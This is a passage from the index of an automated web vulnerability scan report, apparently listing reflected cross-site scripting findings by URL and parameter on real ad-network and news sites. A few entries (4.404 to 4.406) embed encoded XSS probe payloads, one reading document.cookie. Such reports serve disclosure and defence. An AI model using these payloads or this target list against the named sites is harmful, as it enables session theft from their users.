4.94. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [c parameter]

4.95. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [c parameter]

4.96. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [forced_click parameter]

4.97. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [forced_click parameter]

4.98. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [m parameter]

4.99. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [m parameter]

4.100. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [mid parameter]

4.101. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [mid parameter]

4.102. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [sid parameter]

4.103. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [sid parameter]

4.104. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [sz parameter]

4.105. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [sz parameter]

4.106. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [tp parameter]

4.107. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [tp parameter]

4.108. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [c parameter]

4.109. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [c parameter]

4.110. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [forced_click parameter]

4.111. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [forced_click parameter]

4.112. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [m parameter]

4.113. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [m parameter]

4.114. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [mid parameter]

4.115. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [mid parameter]

4.116. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [sid parameter]

4.117. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [sid parameter]

4.118. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [sz parameter]

4.119. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [sz parameter]

4.120. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [tp parameter]

4.121. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [tp parameter]

4.122. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [c parameter]

4.123. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [c parameter]

4.124. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [forced_click parameter]

4.125. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [m parameter]

4.126. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [m parameter]

4.127. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [mid parameter]

4.128. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [mid parameter]

4.129. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [sid parameter]

4.130. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [sz parameter]

4.131. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [tp parameter]

4.132. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [tp parameter]

4.133. http://ad.doubleclick.net/adj/cm.rev_bostonherald/ [name of an arbitrarily supplied request parameter]

4.134. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 2]

4.135. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 3]

4.136. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 4]

4.137. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [name of an arbitrarily supplied request parameter]

4.138. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [sz parameter]

4.139. http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 2]

4.140. http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 3]

4.141. http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 4]

4.142. http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [abr parameter]

4.143. http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [name of an arbitrarily supplied request parameter]

4.144. http://ad.turn.com/server/pixel.htm [fpid parameter]

4.145. http://ads.adxpose.com/ads/ads.js [uid parameter]

4.146. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

4.147. http://ads.roiserver.com/tag.jsp [h parameter]

4.148. http://ads.roiserver.com/tag.jsp [pid parameter]

4.149. http://ads.roiserver.com/tag.jsp [w parameter]

4.150. http://adsfac.us/ag.asp [cc parameter]

4.151. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]

4.152. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]

4.153. http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]

4.154. http://ar.imlive.com/waccess/ [cbname parameter]

4.155. http://ar.imlive.com/waccess/ [from parameter]

4.156. http://ar.imlive.com/waccess/ [promocode parameter]

4.157. http://ar.voicefive.com/b/rc.pli [func parameter]

4.158. http://ar.voicefive.com/bmx3/broker.pli [AR_C parameter]

4.159. http://ar.voicefive.com/bmx3/broker.pli [PRAd parameter]

4.160. http://assets.nydailynews.com/css/20090601/nydn_homepage.css [REST URL parameter 1]

4.161. http://assets.nydailynews.com/css/20090601/nydn_homepage.css [REST URL parameter 2]

4.162. http://assets.nydailynews.com/css/20090601/nydn_homepage.css [REST URL parameter 3]

4.163. http://assets.nydailynews.com/css/20101001/nydn_global.css [REST URL parameter 1]

4.164. http://assets.nydailynews.com/css/20101001/nydn_global.css [REST URL parameter 2]

4.165. http://assets.nydailynews.com/css/20101001/nydn_global.css [REST URL parameter 3]

4.166. http://assets.nydailynews.com/css/20101001/nydn_section.css [REST URL parameter 1]

4.167. http://assets.nydailynews.com/css/20101001/nydn_section.css [REST URL parameter 2]

4.168. http://assets.nydailynews.com/css/20101001/nydn_section.css [REST URL parameter 3]

4.169. http://assets.nydailynews.com/css/20101001/nydn_wrapper.css [REST URL parameter 1]

4.170. http://assets.nydailynews.com/css/20101001/nydn_wrapper.css [REST URL parameter 2]

4.171. http://assets.nydailynews.com/css/20101001/nydn_wrapper.css [REST URL parameter 3]

4.172. http://assets.nydailynews.com/css/thickbox.css [REST URL parameter 1]

4.173. http://assets.nydailynews.com/css/thickbox.css [REST URL parameter 2]

4.174. http://assets.nydailynews.com/js/nydn-pack-20101001.js [REST URL parameter 1]

4.175. http://assets.nydailynews.com/js/nydn-pack-20101001.js [REST URL parameter 2]

4.176. http://assets.nydailynews.com/js/thickbox.js [REST URL parameter 1]

4.177. http://assets.nydailynews.com/js/thickbox.js [REST URL parameter 2]

4.178. http://assets.nydailynews.com/js/webtrends.js [REST URL parameter 1]

4.179. http://assets.nydailynews.com/js/webtrends.js [REST URL parameter 2]

4.180. http://b.scorecardresearch.com/beacon.js [c1 parameter]

4.181. http://b.scorecardresearch.com/beacon.js [c10 parameter]

4.182. http://b.scorecardresearch.com/beacon.js [c15 parameter]

4.183. http://b.scorecardresearch.com/beacon.js [c2 parameter]

4.184. http://b.scorecardresearch.com/beacon.js [c3 parameter]

4.185. http://b.scorecardresearch.com/beacon.js [c4 parameter]

4.186. http://b.scorecardresearch.com/beacon.js [c5 parameter]

4.187. http://b.scorecardresearch.com/beacon.js [c6 parameter]

4.188. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 2]

4.189. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 3]

4.190. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 4]

4.191. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 2]

4.192. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 3]

4.193. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 4]

4.194. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 5]

4.195. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 6]

4.196. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 7]

4.197. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 2]

4.198. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 3]

4.199. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 4]

4.200. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 5]

4.201. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 6]

4.202. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 7]

4.203. http://base.liveperson.net/hc/5296924/cmd/url/ [page parameter]

4.204. https://base.liveperson.net/hc/5296924/ [REST URL parameter 2]

4.205. https://base.liveperson.net/hc/5296924/ [lpCallId parameter]

4.206. http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]

4.207. http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]

4.208. http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]

4.209. http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]

4.210. http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]

4.211. http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]

4.212. http://boston30.autochooser.com/results.asp [name of an arbitrarily supplied request parameter]

4.213. http://boston30.autochooser.com/results.asp [pagename parameter]

4.214. http://boston30.autochooser.com/results.asp [postto parameter]

4.215. http://bostonherald.com/news/document.bg [f parameter]

4.216. http://bostonherald.com/news/document.bg [h parameter]

4.217. http://bostonherald.com/search/ [topic parameter]

4.218. http://bostonherald.com/search/ [topic parameter]

4.219. http://bostonherald.com/track/inside_track/view.bg [format parameter]

4.220. http://bostonherald.com/track/star_tracks/view.bg [format parameter]

4.221. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]

4.222. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]

4.223. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]

4.224. http://br.imlive.com/waccess/ [cbname parameter]

4.225. http://br.imlive.com/waccess/ [from parameter]

4.226. http://br.imlive.com/waccess/ [gotopage parameter]

4.227. http://br.imlive.com/waccess/ [promocode parameter]

4.228. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

4.229. http://c.chango.com/collector/tag.js [partnerId parameter]

4.230. http://c.chango.com/collector/tag.js [referrerURL parameter]

4.231. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

4.232. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

4.233. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

4.234. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

4.235. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [c parameter]

4.236. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [l parameter]

4.237. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [l parameter]

4.238. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [name of an arbitrarily supplied request parameter]

4.239. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

4.240. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

4.241. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

4.242. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

4.243. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]

4.244. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]

4.245. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [l parameter]

4.246. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [name of an arbitrarily supplied request parameter]

4.247. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [q parameter]

4.248. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [q parameter]

4.249. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]

4.250. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]

4.251. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]

4.252. http://cafr.imlive.com/waccess/ [cbname parameter]

4.253. http://cafr.imlive.com/waccess/ [from parameter]

4.254. http://cafr.imlive.com/waccess/ [gotopage parameter]

4.255. http://cafr.imlive.com/waccess/ [promocode parameter]

4.256. http://cbs6albany.oodle.com/ [name of an arbitrarily supplied request parameter]

4.257. http://common.cdn.onset.freedom.com/common/tools/load.php [js parameter]

4.258. http://common.cdn.onset.freedom.com/common/tools/load.php [js parameter]

4.259. http://common.cdn.onset.freedom.com/common/tools/load.php [name of an arbitrarily supplied request parameter]

4.260. http://common.onset.freedom.com/common/tools/load.php [js parameter]

4.261. http://common.onset.freedom.com/common/tools/load.php [js parameter]

4.262. http://common.onset.freedom.com/common/tools/load.php [name of an arbitrarily supplied request parameter]

4.263. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 10]

4.264. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 11]

4.265. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 4]

4.266. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 5]

4.267. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 6]

4.268. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 7]

4.269. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 8]

4.270. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 9]

4.271. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

4.272. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

4.273. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]

4.274. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

4.275. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

4.276. http://de.imlive.com/ [name of an arbitrarily supplied request parameter]

4.277. http://de.imlive.com/ [name of an arbitrarily supplied request parameter]

4.278. http://de.imlive.com/waccess/ [cbname parameter]

4.279. http://de.imlive.com/waccess/ [from parameter]

4.280. http://de.imlive.com/waccess/ [gotopage parameter]

4.281. http://de.imlive.com/waccess/ [promocode parameter]

4.282. http://digg.com/submit [REST URL parameter 1]

4.283. http://dk.imlive.com/ [name of an arbitrarily supplied request parameter]

4.284. http://dk.imlive.com/ [name of an arbitrarily supplied request parameter]

4.285. http://dk.imlive.com/waccess/ [cbname parameter]

4.286. http://dk.imlive.com/waccess/ [from parameter]

4.287. http://dk.imlive.com/waccess/ [gotopage parameter]

4.288. http://dk.imlive.com/waccess/ [promocode parameter]

4.289. http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23 [REST URL parameter 2]

4.290. http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23 [REST URL parameter 3]

4.291. http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23 [REST URL parameter 4]

4.292. http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]

4.293. http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23 [name of an arbitrarily supplied request parameter]

4.294. http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23 [REST URL parameter 2]

4.295. http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23 [REST URL parameter 3]

4.296. http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23 [REST URL parameter 4]

4.297. http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23 [USNetwork/ATTWL_11Q1_Cllctv_MobRON_300 parameter]

4.298. http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23 [name of an arbitrarily supplied request parameter]

4.299. http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23 [REST URL parameter 2]

4.300. http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23 [REST URL parameter 3]

4.301. http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23 [REST URL parameter 4]

4.302. http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]

4.303. http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23 [name of an arbitrarily supplied request parameter]

4.304. http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23 [REST URL parameter 2]

4.305. http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23 [REST URL parameter 3]

4.306. http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23 [REST URL parameter 4]

4.307. http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]

4.308. http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23 [name of an arbitrarily supplied request parameter]

4.309. http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23 [REST URL parameter 2]

4.310. http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23 [REST URL parameter 3]

4.311. http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23 [REST URL parameter 4]

4.312. http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]

4.313. http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23 [name of an arbitrarily supplied request parameter]

4.314. http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23 [REST URL parameter 2]

4.315. http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23 [REST URL parameter 3]

4.316. http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23 [REST URL parameter 4]

4.317. http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]

4.318. http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23 [name of an arbitrarily supplied request parameter]

4.319. http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23 [REST URL parameter 2]

4.320. http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23 [REST URL parameter 3]

4.321. http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23 [REST URL parameter 4]

4.322. http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter]

4.323. http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23 [name of an arbitrarily supplied request parameter]

4.324. http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23 [REST URL parameter 2]

4.325. http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23 [REST URL parameter 3]

4.326. http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23 [REST URL parameter 4]

4.327. http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23 [USNetwork/RS_SELL_2011Q1_TF_CT_728 parameter]

4.328. http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23 [name of an arbitrarily supplied request parameter]

4.329. http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23 [REST URL parameter 2]

4.330. http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23 [REST URL parameter 3]

4.331. http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23 [REST URL parameter 4]

4.332. http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]

4.333. http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23 [name of an arbitrarily supplied request parameter]

4.334. http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23 [REST URL parameter 2]

4.335. http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23 [REST URL parameter 3]

4.336. http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23 [REST URL parameter 4]

4.337. http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter]

4.338. http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23 [name of an arbitrarily supplied request parameter]

4.339. http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23 [REST URL parameter 2]

4.340. http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23 [REST URL parameter 3]

4.341. http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23 [REST URL parameter 4]

4.342. http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]

4.343. http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23 [name of an arbitrarily supplied request parameter]

4.344. http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23 [REST URL parameter 2]

4.345. http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23 [REST URL parameter 3]

4.346. http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23 [REST URL parameter 4]

4.347. http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_160 parameter]

4.348. http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23 [name of an arbitrarily supplied request parameter]

4.349. http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23 [REST URL parameter 2]

4.350. http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23 [REST URL parameter 3]

4.351. http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23 [REST URL parameter 4]

4.352. http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]

4.353. http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23 [name of an arbitrarily supplied request parameter]

4.354. http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23 [REST URL parameter 2]

4.355. http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23 [REST URL parameter 3]

4.356. http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23 [REST URL parameter 4]

4.357. http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter]

4.358. http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23 [name of an arbitrarily supplied request parameter]

4.359. http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23 [REST URL parameter 2]

4.360. http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23 [REST URL parameter 3]

4.361. http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23 [REST URL parameter 4]

4.362. http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter]

4.363. http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23 [name of an arbitrarily supplied request parameter]

4.364. http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23 [REST URL parameter 2]

4.365. http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23 [REST URL parameter 3]

4.366. http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23 [REST URL parameter 4]

4.367. http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]

4.368. http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23 [name of an arbitrarily supplied request parameter]

4.369. http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23 [REST URL parameter 2]

4.370. http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23 [REST URL parameter 3]

4.371. http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23 [REST URL parameter 4]

4.372. http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter]

4.373. http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23 [name of an arbitrarily supplied request parameter]

4.374. http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23 [REST URL parameter 2]

4.375. http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23 [REST URL parameter 3]

4.376. http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23 [REST URL parameter 4]

4.377. http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter]

4.378. http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23 [name of an arbitrarily supplied request parameter]

4.379. http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23 [REST URL parameter 2]

4.380. http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23 [REST URL parameter 3]

4.381. http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23 [REST URL parameter 4]

4.382. http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23 [USNetwork/RS_SELL_2011Q1_TF_CT_728 parameter]

4.383. http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23 [name of an arbitrarily supplied request parameter]

4.384. http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23 [REST URL parameter 2]

4.385. http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23 [REST URL parameter 3]

4.386. http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23 [REST URL parameter 4]

4.387. http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23 [USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300 parameter]

4.388. http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23 [name of an arbitrarily supplied request parameter]

4.389. http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95 [REST URL parameter 2]

4.390. http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95 [REST URL parameter 3]

4.391. http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95 [REST URL parameter 4]

4.392. http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95 [na_id parameter]

4.393. http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95 [name of an arbitrarily supplied request parameter]

4.394. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 2]

4.395. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 3]

4.396. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 4]

4.397. http://es.imlive.com/ [name of an arbitrarily supplied request parameter]

4.398. http://es.imlive.com/ [name of an arbitrarily supplied request parameter]

4.399. http://es.imlive.com/waccess/ [cbname parameter]

4.400. http://es.imlive.com/waccess/ [from parameter]

4.401. http://es.imlive.com/waccess/ [gotopage parameter]

4.402. http://es.imlive.com/waccess/ [promocode parameter]

4.403. http://event.adxpose.com/event.flow [uid parameter]

4.404. http://events.cbs6albany.com/ [376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3 parameter]

4.405. http://events.cbs6albany.com/ [376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3 parameter]

4.406. http://events.cbs6albany.com/ [376e5%22%3e%3cscript%3ealert(1 parameter]

4.407. http://events.cbs6albany.com/ [name of an arbitrarily supplied request parameter]

4.408. http://events.cbs6albany.com/albany-ny/events [name of an arbitrarily supplied request parameter]

4.409. http://events.cbs6albany.com/albany-ny/events/business+tech [name of an arbitrarily supplied request parameter]

4.410. http://events.cbs6albany.com/albany-ny/events/performing+arts [REST URL parameter 1]

4.411. http://events.cbs6albany.com/albany-ny/events/performing+arts [REST URL parameter 3]

4.412. http://events.cbs6albany.com/albany-ny/events/performing+arts [REST URL parameter 3]

4.413. http://events.cbs6albany.com/albany-ny/events/performing+arts [name of an arbitrarily supplied request parameter]

